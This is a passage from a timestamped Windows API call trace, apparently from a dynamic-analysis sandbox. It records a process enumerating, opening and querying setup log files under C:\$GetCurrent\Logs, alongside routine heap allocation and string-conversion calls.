Parameter=0x1086e48, Context=0x0) returned 1 [0059.548] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0059.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0059.549] AreFileApisANSI () returned 1 [0059.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0059.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a3b0 [0059.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=58 | out: lpWideCharStr="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 58 [0059.549] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0059.607] GetFileType (hFile=0x428) returned 0x1 [0059.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0059.608] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0059.608] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0059.608] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0059.609] CloseHandle (hObject=0x428) returned 1 [0059.613] AreFileApisANSI () returned 1 [0059.613] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0059.613] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a3b0 [0059.613] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=58 | out: lpWideCharStr="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 58 [0059.613] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0059.613] GetFileType (hFile=0x428) returned 0x1 [0059.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0059.613] CloseHandle (hObject=0x428) returned 1 [0059.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0059.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0059.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0059.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0059.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0059.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0059.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0059.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0059.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0059.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0059.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0059.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0059.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0059.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0059.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0059.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0059.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0059.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0059.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0059.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0059.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0059.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0059.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0059.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0059.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0059.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0059.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0059.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0059.615] AreFileApisANSI () returned 1 [0059.615] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0059.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x69db0 [0059.615] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=58 | out: lpWideCharStr="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 58 [0059.615] GetFileAttributesExW (in: lpFileName="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x542c8aac, ftLastAccessTime.dwHighDateTime=0x1d3273a, ftLastWriteTime.dwLowDateTime=0xafe5f7a, ftLastWriteTime.dwHighDateTime=0x1d3273e, nFileSizeHigh=0x0, nFileSizeLow=0xa6b2)) returned 1 [0059.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0059.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0059.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0059.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0059.617] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.617] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.617] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x973abb0f, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x980eecb6, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1774, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="oobe_2017_09_07_03_08_57_737.log", cAlternateFileName="OOBE_2~1.LOG")) returned 1 [0059.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0059.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e500 [0059.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0059.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69300 [0059.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e500 | out: hHeap=0x20000) returned 1 [0059.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0059.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0059.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0059.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0059.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0059.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0059.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0059.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0059.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0059.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0059.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0059.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0059.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0059.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0059.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0059.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0059.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e500 [0059.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0059.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0059.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e500 | out: hHeap=0x20000) returned 1 [0059.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0059.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0059.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0059.617] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.618] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.618] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.618] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0059.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0059.618] AreFileApisANSI () returned 1 [0059.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log", lpUsedDefaultChar=0x0) returned 53 [0059.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0059.618] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.618] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0059.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0059.618] AreFileApisANSI () returned 1 [0059.618] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0059.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75dc8 [0059.618] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x75dc8, cchWideChar=53 | out: lpWideCharStr="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned 53 [0059.618] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0059.661] GetFileType (hFile=0x424) returned 0x1 [0059.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0059.661] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0059.662] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0059.662] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0059.662] CloseHandle (hObject=0x424) returned 1 [0059.662] AreFileApisANSI () returned 1 [0059.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0059.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75b70 [0059.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x75b70, cchWideChar=53 | out: lpWideCharStr="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned 53 [0059.662] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0059.662] GetFileType (hFile=0x424) returned 0x1 [0059.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0059.662] CloseHandle (hObject=0x424) returned 1 [0059.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0059.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0059.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0059.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885e0 [0059.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0059.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0059.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0059.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885e0 | out: hHeap=0x20000) returned 1 [0059.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0059.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0059.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0059.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0059.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0059.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0059.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0059.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0059.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0059.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0059.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0059.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0059.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0059.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0059.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0059.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d2c0 [0059.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0059.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0059.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d2c0 | out: hHeap=0x20000) returned 1 [0059.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0059.663] AreFileApisANSI () returned 1 [0059.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0059.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76188 [0059.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x76188, cchWideChar=53 | out: lpWideCharStr="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned 53 [0059.663] GetFileAttributesExW (in: lpFileName="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x973abb0f, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x980eecb6, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1774)) returned 1 [0059.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0059.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0059.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0059.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0059.664] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.664] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.664] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c5a0a89, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x9c5a0a89, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xbb3747bd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="PartnerSetupCompleteResult.log", cAlternateFileName="PARTNE~1.LOG")) returned 1 [0059.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0059.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e500 [0059.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0059.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0059.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e500 | out: hHeap=0x20000) returned 1 [0059.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x535f8 [0059.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0059.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0059.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0059.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x535f8 | out: hHeap=0x20000) returned 1 [0059.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0059.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0059.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0059.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0059.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0059.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0059.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0059.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0059.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0059.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0059.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0059.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e500 [0059.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x535f8 [0059.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0059.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e500 | out: hHeap=0x20000) returned 1 [0059.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x535f8 | out: hHeap=0x20000) returned 1 [0059.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0059.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0059.664] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.664] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.664] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.665] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0059.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0059.665] AreFileApisANSI () returned 1 [0059.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log", lpUsedDefaultChar=0x0) returned 51 [0059.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0059.665] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.665] InitOnceExecuteOnce (in: InitOnce=0x1086e18, 